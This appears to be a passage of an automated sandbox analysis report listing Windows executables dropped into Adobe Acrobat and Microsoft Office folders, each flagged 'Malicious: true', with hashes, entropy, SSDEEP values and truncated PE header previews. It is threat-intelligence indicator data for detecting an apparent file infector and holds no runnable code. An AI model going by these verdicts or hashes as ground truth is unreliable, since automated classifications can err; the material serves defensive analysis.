SHA-256:	1803E7C24F44A66FEA87C6E3D7D5B207A17FE720FA81C4711F39A3BA700536C4
SHA-512:	BDD2320EE9736260DFCA64873CE392DE85A7DA52EE2A265BC57778617F3924226B308EC366D2415026BC62D9A74A50FBE818C040E44383BC25600C9E82E3D04B
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......<.tKx...x...x...q..t.......c.......r.......{.......~...l...}...x...........\|.......y...x...y.......y...Richx...................PE..d......d.........."..........>.......0.........@.......................................... .................................................lV..........h...........................PI..T....................K..(....I..8............@...............................text....,.......................... ..`.rdata..4"...@...$...2..............@..@.data........p.......V..............@....pdata...............X..............@..@.rsrc...h............\..............@..@.reloc...`...........h..............@...................................................................................................................................................................................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe

Download File

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	12039168
Entropy (8bit):	6.595653863105095
Encrypted:	false
SSDEEP:	98304:Ub+MzPstUEHInwZ33RBk9DdhgJCudq1uVIyESYgKb7wRGpj3:mnPgTHIwZnRBk9DdhSUEVIXgKfF9
MD5:	3204C3F77160E13B7EB4D716FF809E55
SHA1:	B74BF73BADA642B3EC064BF20BC04FA7A0B98D43
SHA-256:	F56A1FD1E22BDED95392DC983B93293A4F258D925245B6BDC5D146EE6792D000
SHA-512:	1FD476E7FD8376E255C2E00AB1841436CFB2F1E5E7046ABA48AE1486C40E75F4167FE92A928FFD44A360946CCEDA67F8B3A886D67F238AB3BAD143B9084B3A81
Malicious:	true
Preview:	MZ......................@...................................H...........!..L.!This program cannot be run in DOS mode....$.......&.w.bb..bb..bb..v...lb..v...b.....qb.....hb......ab......b..E.t.Vb..E.d.jb.....ib......b..v...\|b..v...cb.....`..bb..}b..v...Ab..bb..,`.....b.....cb.....cb..bb..`b.....cb..Richbb..........PE..d......d..........".........../.....0.F........@......................................... ............................................\...,..h........G......Lz..................P..T......................(......8...........................................text............................... ..`.rdata..f. .......!.................@..@.data..............................@....pdata..Lz.......\|.................@..@.didat...............X..............@..._RDATA...............Z..............@..@.rsrc....G.......H...\..............@..@.reloc... .........................@...........................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe

Download File

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1478144
Entropy (8bit):	4.826046913939756
Encrypted:	false
SSDEEP:	24576:Vg5FvCPcsr/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:yfH4LNiXicJFFRGNzj3
MD5:	463DFF08520940EC94DD3BA9F1530336
SHA1:	1D65768D1DC2C553E47FCC909EBDCE6C164E65FB
SHA-256:	6B1F76521F60913308D36618AF15291B866DE5255706DBAA0BA26C89C2780771
SHA-512:	387CD3CAB4152E8DCD069CA122F16434C25F48D33BD577EB901F674771EC157D3C785EA7298161B8F756722C3F2A26209E3447C2D379C0CE103992CB331917DE
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ z.A...A...A...9...A..O5...A..O5...A..O5...A..O5...A...*...A...A...@..M5...A..M5.A...A...A..M5...A..Rich.A..................PE..d......d.........."..........b.................@..............................!......M.... .................................................X...h....p..p....P..t.......................T.......................(.......8............................................text...,........................... ..`.rdata.............................@..@.data........@.......&..............@....pdata..t....P......................@..@.rsrc...p....p.......B..............@..@.reloc...`... ......................@...................................................................................................................................................................................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe

Download File

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1339904
Entropy (8bit):	7.200188437030194
Encrypted:	false
SSDEEP:	24576:8jKTIsAjFuvt9fmFthMaT5U8aChaeu9/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:8jI/mPh7TT79wLNiXicJFFRGNzj3
MD5:	0AA09EBE19DEC9BDFEFC69B91C8A92C9
SHA1:	76B58F9B5980131929CDF9A74CF194C1AB5350CC
SHA-256:	7D2B51D389BB9149D3F06BBF45EDCF14984E6E1CE8201C4EA35E97FA0164F7AF
SHA-512:	DADCA782296E7B39A48CEFDFD1561D6EA180C3685D885DC981BC87801C585C40FD6F7838B1443A5F81DABB7E0DFFFA3CC429B3485C1EFB6A6101DEEAD50B77BE
Malicious:	true
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$......................................s...X............................[....U=....................h...n......n.Y.....1....n......Rich...........PE..d......c..........".................0i.........@..............................$......@.... .................................................H...d............@..Tx......................p...................`...(...`................................................text............................... ..`.rdata..@...........................@..@.data....>......."..................@....pdata..Tx...@...z..................@..@.rsrc................z..............@..@.reloc..............................@...................................................................................................................................................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe

Download File

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1671168
Entropy (8bit):	5.0049502438079205
Encrypted:	false
SSDEEP:	24576:xGqVwCto1Om5Wgx/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:QZ1OmUaLNiXicJFFRGNzj3
MD5:	9DEB2CB4248446406E36DE390B5F9864
SHA1:	7A9EA979B9B562D1B385469D3E4910BE2EB1C2DA
SHA-256:	D16819C528C46571E5D25C601E16329B18F0713D283CA2EF5A8DA2840CB65BA9
SHA-512:	A77D0EB6D3232C6733962DC02C1459136E3654DF87E9210E1A4D24D6025DFBB35295CB1F97C03C2A63D99F70C3B84C3D01A97E0706CF746D31885BEF1D59BF73
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.....................v......................................a..X.....X........r....X.....Rich...........PE..d......c.........."............................@..............................$......i.... .................................................. ...........v..............................p.......................(....................0...............................text............................... ..`.rdata..Z$...0...&..................@..@.data...x"...`.......@..............@....pdata...............L..............@..@.rsrc....v.......v...j..............@..@.reloc...`...0......................@...................................................................................................................................................................................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe

Download File

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1409024
Entropy (8bit):	4.686401454651768
Encrypted:	false
SSDEEP:	24576:jWBWP/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:lLNiXicJFFRGNzj3
MD5:	C85BA1DA92E2FC4744D309E5E97F5C8F
SHA1:	3851A0E079A2F97D6D33E22EAF15CC1F6036ADEA
SHA-256:	5BFD00CDE4FE393CA2840BB348541497FDF99275BE116D1E173C40E9B84B92FB
SHA-512:	62416384091411ADCBB804DF34A81D3DECCF60163448F06A1C78CE9B07BF3F7EF7EA6BE7AA6DF480F40597CE7B5B5F26E0FA4D8492A0C3B265E8C48A52521580
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1.v.Pc%.Pc%.Pc%.(.%.Pc%C$g$.Pc%C$`$.Pc%C$f$.Pc%C$b$.Pc%.;g$.Pc%.;b$.Pc%.Pb%EPc%z$f$.Pc%z$.%.Pc%.P.%.Pc%z$a$.Pc%Rich.Pc%................PE..d...DC,d.........."............................@.............................p .......... .................................................h...@.......@............................Q..T....................S..(... R..8............0...............................text............................... ..`.rdata..$....0......................@..@.data...............................@....pdata..............................@..@.rsrc...@...........................@..@.reloc...`..........................@...........................................................................................................................................................................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe

Download File

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1683968
Entropy (8bit):	7.221679221685133
Encrypted:	false
SSDEEP:	49152:o+GtCi27mVdyT+a0GLNiXicJFFRGNzj3:Lmd27v7wRGpj3
MD5:	016EF81834C49E51B643561DCA2454CA
SHA1:	DB49B8A1682B5D58B8A754403058F396EB113906
SHA-256:	28AE10AB4F861F2235967ABBE4AA4DAEF76C1D392457FC4A5AF4438FAC9AA63E
SHA-512:	A4993CAE4CF4D80413D104F24B0B36BCB9B79DDAD15C658CE1D9E628A7413129502A54D55F45A8E8D4611EA935DB33BE155281B1DB5CC37B271361BEFCCB0688
Malicious:	true
Preview:	MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$........ ..N...N...N......N.e.K...N...O...N...J...N...M...N...H...N...K...N...#...N.<~3...N..C3...N...O...N...O.O.N...F...N.......N......N...L...N.Rich..N.................PE..d...%..c.........."......j...t......@..........@....................................P..... .................................................x........... ....p..dt......................p.......................(... ...8............................................text...kh.......j.................. ..`.rdata...............n..............@..@.data...`S.......F..................@....pdata..dt...p...v...D..............@..@.rsrc... ...........................@..@.reloc..............................@...........................................................................................................................................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe

Download File

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	3110912
Entropy (8bit):	6.646863973046011
Encrypted:	false
SSDEEP:	49152:wU198PzqkltcT0gViqNfBZQiOIK5Ns6YZ82PTJeYJLNiXicJFFRGNzj3:R9NfHOIK5Ns6qR9/7wRGpj3
MD5:	9792A1431B8E6D31A17C95FF521A4215
SHA1:	306E5D14F061EC8C4E935036CDA66CC37E50828E
SHA-256:	FE4A7B7293B23C4C52F2A06DF6A159E5707E9D43423A2AC8B0A7D9F97805B87E
SHA-512:	D76756D180594DFC719A6081550819D22C069BFB234590C7DC20A16C0AB58CFC87A477B0FCF5CFAF091E945D2557E1C8637AB669973108660BAC18A5AFC40AD2
Malicious:	true
Preview:	MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.......'A3rc ]!c ]!c ]!..!h ]!..!. ]!..!x ]!1UY r ]!1U^ i ]!.O.!a ]!..!g ]!..!b ]!1UX . ]!..!@ ]!.UX . ]!c \!.!]!.UT . ]!.U.!b ]!c .!b ]!.U_ b ]!Richc ]!................PE..d.....Zd..........".................t..........@..............................0......./... ..................................................o .......&......$.`....................x..p....................y..(....)..8....................j .@....................text............................... ..`.rdata..8...........................@..@.data....q.... ..<...r .............@....pdata..`.....$.......#.............@..@_RDATA........&.......%.............@..@.rsrc........&.......%.............@..@.reloc...@....&..0...H&.............@...................................................................................................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe

Download File

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1743872
Entropy (8bit):	5.136838773707445
Encrypted:	false
SSDEEP:	24576:CkIWTUQcydh/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:CxKUOLNiXicJFFRGNzj3
MD5:	DC229E281F9A0F83EE573D6FBC6CF06C
SHA1:	9E75AD53024BFDF16AEA259344B52AE2CC85C0A0
SHA-256:	EB24571B92A7C89D287DF510331585652E498F0A1288C778A5EE1120191CB005
SHA-512:	645532DBF0888BE40CD6964B65B13FA2D64EAA08525BBF4FC3C08C0157A827C6EEC2950DEC59C33BBFD83CE49294AB41D9A2F2A4E415D2138EB36C53A8DF4808
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........0I..Q'..Q'..Q'..7#..Q'..7$..Q'..7".!Q'..$#..Q'..$$..Q'..7&..Q'..$"..Q'.x$"..Q'..Q&.dQ'.x$...Q'.x$...Q'..Q...Q'.x$%..Q'.Rich.Q'.........................PE..d.....Zd.........."......,..........(?.........@..............................%.....&..... .................................................(...P................m..................tC..p...........................p...8............@..........@....................text....+.......,.................. ..`.rdata......@.......0..............@..@.data....)..........................@....pdata...m.......n..................@..@_RDATA...............B..............@..@.rsrc................D..............@..@.reloc...p...@......................@...................................................................................................................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe

Download File

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1494016
Entropy (8bit):	4.896114578767387
Encrypted:	false
SSDEEP:	24576:3O+qBW/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:e+tLNiXicJFFRGNzj3
MD5:	891A96A935B324710FF5AEB5EABE3D2A
SHA1:	1D76BBB34223B9772382C1B5AD296A1E52828502
SHA-256:	5A42EB198F69C8A723691283D5BAF1E9406B83A69E8A88A1419D22401B1BD6C6
SHA-512:	95396A7211B4C4D1C34788E4D9977ADD38B81FA633B443C5D0C4EA53BFC32A4839FC2010D5AC1F5E0C3570E815338DA389805F3F4DF77747F651146DEE7C1285
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......K..*...y...y...y...y...y..x...y..x...y..x...y..x-..y..Ey...yb.x...y...y..yN.x...yN.}y...yN.x...yRich...y........PE..L...<..[................. ...................0....@...........................!......6..............................................0...............................J..p....................K.......J..@............0...............................text... ........ .................. ..`.rdata.......0.......$..............@..@.data....E.......B..................@....rsrc........0......................@..@.reloc.......@......................@...................................................................................................................................................................................................................................................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe

Download File

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1298944
Entropy (8bit):	4.521154817884432
Encrypted:	false
SSDEEP:	12288:CiJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:E/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
MD5:	A881D846F6F72CFA63E7166CFBE9049A
SHA1:	C161E66892D0FB3C4FA747F6489C8CF359758C1F
SHA-256:	C0905EC3C129044901A69CF0C20D30D321FE2C85BF7E6E927A09E6FF1014EE8C
SHA-512:	AE0518219B3CF93129E4DB3586F6F39B95A92EA81D4E6B39ED3A1895069171DB34940DE976C93BEEE71710C5270326C79D2B9A7959E88A976CA4BF7C88FAADA4
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................+.............................................................G.............Rich............................PE..d...~^.c.........."..........$......p..........@....................................1..... ..................................................;.......p.......`......................d4..p............................4..8............0..0............................text...\|........................... ..`.rdata.......0......................@..@.data........P.......,..............@....pdata.......`......................@..@.rsrc........p.......0..............@..@.reloc...`...........2..............@...................................................................................................................................................................................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe

Download File

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1317376
Entropy (8bit):	4.550845023147767
Encrypted:	false
SSDEEP:	12288:6miJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:L/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
MD5:	7645097201666A450BD97192F43E8AC2
SHA1:	94820055A5A84027A9F1586660DBDBD35415CEB4
SHA-256:	223F41A2D8AA07C779384C9B569A0833B4B684204485DC1D598DDCA2D478A1C8
SHA-512:	063B1A042CEFD1230E81D1F4C910F2402B0B00634079526400609CFC20E6592A4C01C7EBA91AE91370A6B7AA92F4270460FEB798082962ADEBD918DCBAD823C7
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......2\.v=..v=..v=...E?.x=..I..\|=..I..u=..I..j=..I..p=..bV..q=..v=...=..I..t=..IS.w=..v=;.w=..I..w=..Richv=..........................PE..d....^.c.........."......<...B.......>.........@.....................................e.... ..................................................i..........P.......,...................`X..T............................X..8............P...............................text....;.......<.................. ..`.rdata..$'...P...(...@..............@..@.data................h..............@....pdata..,............l..............@..@.rsrc...P............r..............@..@.reloc...`...........z..............@...........................................................................................................................................................................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe

Download File

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	4151808
Entropy (8bit):	6.496759834325973
Encrypted:	false
SSDEEP:	49152:AtuUC0nNc/RcYHCY9AWWnUOqdHIEogMAYrukdUmSC+bXMZQU1QqpN755rLNiXico:AjEIa3HIEWOc5p7wRGpj3
MD5:	CE99349E872B427DDB792F14EB4CFAE1
SHA1:	05A7CDBF20514B946C3F28559FD9AEDC8E6B3E24
SHA-256:	0F298DDA5688AC9CCF0ECCC11D3D95A249DFB87A1AD9B191927010D15A9D31BF
SHA-512:	ADF2556AC9C3F0C1A576A9896FCCBF8F2CFC5067C8F2AAFD534F98990F3ABADD21EA1FBD938DA9037F01B3318E63CA25F4B40D07D6610F4135A1BFAF840BEACB
Malicious:	true
Preview:	MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$........x...............r.......r.......r.......v$.....>m......>m......>m.......r...............r..............<m......<m......<m&.......N.....<m......Rich............................PE..d...<..d.........."......:....................@............................. @......Q@... .........................................0.%.......%......0)......p'.......................!.T.....................!.(....s .8............P......l.%......................text....8.......:.................. ..`.rdata.......P.......>..............@..@.data....D... &.......&.............@....pdata.......p'.......&.............@..@.didat........).......(.............@..._RDATA....... ).......(.............@..@.rsrc........0).......(.............@..@.reloc...@....6..0...*6.............@...................................................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe

Download File

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	59941376
Entropy (8bit):	7.999353912127691
Encrypted:	true
SSDEEP:	1572864:/Qb5m2CYw2bheyHA2DiAVPNqCPiQwm9tqGWS15Vj9QVqd2+NAs:IXhwMhe6AABPiQwF6xQ22R
MD5:	9A9700FFD20C4DD77A65AFE87DA345D9
SHA1:	5FD4B0675C46B871FD157685DBEE6ADB3A8092D0
SHA-256:	62C90CBD5E14621B3FC0C1A6285F47131E6523E8B2F73AEB36D0B77FE1E19D11
SHA-512:	C5429A2102ADCE63BB0465D42CFE7D3C9D466825B54BAD100A761306A45338A50D7A53BF1E8CD177667EFAE52F69B26C50069B04430AB71E76EB52C961D975D6
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......;......J...J...Jk.Kt..Jk.Kl..Jk.K..J..Kn..J..Ku..J..K+..Jk.Kt..J...J..J..Kf..J..Kt..J..@J~..J..(J}..J..K~..JRich...J................PE..d...z..d..........".................3.........@.............................0.......m.... .....................................................x....`.........06..................8%..T....................&..(...Pg..8............ ......@...@....................text............................... ..`.rdata...}... ...~..................@..@.data...TS..........................@....pdata..06.......8..................@..@.didat..x....@......................@..._RDATA.......P......................@..@.rsrc.......`.....................@..@.reloc.......@.....................@...................................................................................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe

Download File

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1385984
Entropy (8bit):	4.703444751948808
Encrypted:	false
SSDEEP:	24576:hjkYuq/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:Z/uqLNiXicJFFRGNzj3
MD5:	37A48091A2E1148755AEA1B70D45B02B
SHA1:	7C613805D54F5F31DF1C75B52203C6CEEE3E53DC
SHA-256:	A730B89CF2D7D51C6A63A62CCFEF84B30AB9D047C4C5985925EFD0CE545DF57C
SHA-512:	87C3CC2C6074C627FD61CD88649F2EA777FDE108B213E950ECB424CB70969A8BBC68296784913C739F1E76FF9AD1718797757F6FE6F1ADEC6E9F6ED0B486DC73
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.....................b....6......6......6.....6.....................M..4......4......4........f....4.....Rich...........................PE..L.....{d.................&...`...............@....@.......................... ..............................................r..,................................... O..p....................P.......O..@............@..4............................text....%.......&.................. ..`.rdata...@...@...B...*..............@..@.data................l..............@....rsrc................p..............@..@.reloc...p...........v..............@...................................................................................................................................................................................................................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe

Download File

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1540608
Entropy (8bit):	4.934998087094425
Encrypted:	false
SSDEEP:	24576:OxwSJzkrmZse/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:OyIkrKseLNiXicJFFRGNzj3
MD5:	CD98F00AC9AF99310710B50B2F1EC1E4
SHA1:	B49AD79497A1F5A7C668AABA407871751713B9F0
SHA-256:	49BA462EAEB43C4BDD42C47DDAE5F3484C3858DC807586B64FF7DC8B5D83026A
SHA-512:	BC624468551064B5C2F12E5088E1585A680D627B7557262BD089FEAA033C45B8F083002C8CEC3F9369F8D566DCEB7708DEEAE84A7129C09336C260FB3EBD8F4E
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................y...5.......5.....5......7.......................7.....7.Z....2...7.....Rich..........................PE..d.....{d.........."..........<.......&.........@..............................".....#..... .................................................`...x.... ..............................`j..p....................l..(....j..8............................................text...l........................... ..`.rdata..............................@..@.data...4#..........................@....pdata........... ..................@..@_RDATA..............................@..@.rsrc........ ......................@..@.reloc...`...0......................@...................................................................................................................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe

Download File

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1804800
Entropy (8bit):	5.247474434453234
Encrypted:	false
SSDEEP:	24576:vHQJLIRZvsnNX/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:vHQJLy4XLNiXicJFFRGNzj3
MD5:	6E989ACB281F65D11749A0849B42F9A8
SHA1:	8A706966DB22AF11542E39DC40E7A688A3DC4768
SHA-256:	838B3D9BD344DE8B39D2EB55EC2A6033E1697F65031A37D3F6E0F3BECF18F004
SHA-512:	5C326416C4D7A3055C1E207B34F721C7E3364EDA4671EE377FD09D48008B04E659B918C8C55CF853665AE2A9CF39B9C112A889E4A22E0A1F8CA831CE7379E7CD
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........L<."o."o."o...o.."o+.&n.."o+.!n.."o+.#n."o+.'n."o..$n."o..#n.."o).+n.."o.#o;."o).'n."o)..o."o). n."oRich."o........PE..d......d.........."......\.....................@..............................&.....b..... .................................................."..@....0...........W..................x...T.......................(...`...8............p..........`....................text....[.......\.................. ..`.rdata.......p.......`..............@..@.data....^...P...R...2..............@....pdata...W.......X..................@..@.didat..8...........................@....msvcjmc..... ......................@....rsrc........0......................@..@.reloc...`...@......................@...................................................................................................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe

Download File

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	5365760
Entropy (8bit):	6.4479328178525455
Encrypted:	false
SSDEEP:	49152:BUZujDjDjDjXmXgoz2PsapFQr97dRpqbeE8U2Izwot+bdro4O8b8ITDnlggyJ1kD:mWmXL6DE97dRpKuoQbg87wRGpj3
MD5:	4617D8C9094259B3211A4A28D97988DE
SHA1:	546D5A891D5A03B1214327BC906F7D86576E2282
SHA-256:	DC3A34ECE13A68AE0DC70A1BC77281DB283692A3BB07D0E82D9056D9C2556B88
SHA-512:	001B17FC27735584E9600F886DF9051410F8DED832C477D374918323CD5C427E3312E6C5167CE1BF515ABD3AB000386A3977E4D4D779C07E74EB92A036F8DD5A
Malicious:	true
Preview:	MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$........I.~.(g-.(g-.(g-.Cd,.(g-.Cb,i(g-.G.-.(g-b\c,.(g-b\d,.(g-.t.-.(g-.(g-C(g-b\b,.(g-.Cc,.(g-.Ca,.(g-.Cf,.(g-.(f-.+g-`\b,.(g-`\g,.(g-`\.-.(g-.(.-.(g-`\e,.(g-Rich.(g-........PE..L......d.........."......./..p......P"%.......0...@...........................R.....K.R..............................@:......@:.......;..V...........................^6.T...................._6.....h.5.@.............0...... :.`....................text...*./......./................. ..`.rdata..Ze....0..f....0.............@..@.data....E....:......h:.............@....didat........;......B;.............@....rsrc....V....;..X...H;.............@..@.reloc...P...@G..@....F.............@...........................................................................................................................................................................................................................

C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe

Download File

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3163136
Entropy (8bit):	7.971279100861704
Encrypted:	false
SSDEEP:	98304:orZ23AbsK6Ro022JjL2WEiVqJZL7wRGpj3:CJADmmxL2WEoCZvF9
MD5:	56D2EFE69C9C3F354D6F1B187AC5A9BB
SHA1:	DB79CDD6C77584CFF40692817C815D613B403E3E
SHA-256:	AE6E4BB7C1B68C8A925CA4E972CC163A6111AB4001FB5C9808F9B77B650F66E9
SHA-512:	0070F148E6C20156886727A2C8ECB14F338908433E7ED812CBABD59C8A65300A7163F8D8F142AEB4F4E02E1B2237C923174B22626D35AE318768DCEF2F4881F6
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5{.!q..rq..rq..rq..r...rQc.r`..rQc.r`..rQc.rp..rQc.rp..rRichq..r........................PE..L.....A.................~... .......^... ........... ........................1.......0.......... .....................................0............................!............................................... ...............................text....\|... ...~.................. ..`.data...............................@....rsrc...../......./.................@...................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe

Download File

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1213440
Entropy (8bit):	7.194646762179204
Encrypted:	false
SSDEEP:	24576:dfrYY42wd7hlOE9fpkEE64u/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:Q/9xrSuLNiXicJFFRGNzj3
MD5:	F1EC7848FEA92EE4868B8E5A958A3B80
SHA1:	8A4ADA19E7BCF2DE9033F3C8F5300307821C36E8
SHA-256:	8EA7C665500B10687B5F66C7FBFDBEBD9B78BACFB8DFFE0F75D68AB50AA3FD4F
SHA-512:	00BBB13F60A300EB56F5E91531F589D519068941427E7E96C43D25386807BA92E66FA1E99F802E5B3C7E0791A3989EE57C3829F8077131732192BFF773139FEE
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......@......T...T...T...U...T...U...T..U...T..U...T...U...T..U...T...U...T...Tf..T..U...T..T...T..uT...T..U...TRich...T................PE..d.....{d..........#......J...........3.........@............................. .......G.... ..................................................L.......`..........(J..................p...T.......................(... B..8............`.......I..`....................text....H.......J.................. ..`.rdata..d....`.......N..............@..@.data...(w...p...&...^..............@....pdata..(J.......L..................@..@.didat.......@......................@..._RDATA.......P......................@..@.rsrc........`......................@...................................................................................................................................................................................................

C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe

Download File

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1544192
Entropy (8bit):	4.836097181634504
Encrypted:	false
SSDEEP:	24576:wzNKU/5p/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:wzNr/5pLNiXicJFFRGNzj3
MD5:	0F96AA8D11CA2710C328CFBE6D8F4D85
SHA1:	8286E20EB57F8D6889B9A950BE31F694BC19446E
SHA-256:	BD3485EA2067A2904563FB36D88FCD7ADA1CC67B46973CBCAE47AA4A0B70F148
SHA-512:	FA26ECBED1272A6A4B6BDC26464127EEF97960E710E6021B9619326E4EBE8B809A5466A6252E2B976855D7BD988B150BFA86FB29F1CCAAB84F683B4C07AF0546
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........E@..$...$...$...\...$...V*..$...V-..$...V+..$...V/..$...$/.0 ...V&..$...V..$...V..$...V,..$..Rich.$..........PE..d...!!.R.........."......`..........0C.........@.............................`"........... .......... ......................................Xl..........X.......d.......................T...................8...(.......8...........`...`............................text...(X.......`.................. ..`.rdata..z....p... ...p..............@..@.data...............................@....pdata..d........ ..................@..@.rsrc...X...........................@..@.reloc..............................@...................................................................................................................................................................................................................................................................

C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe

Download File

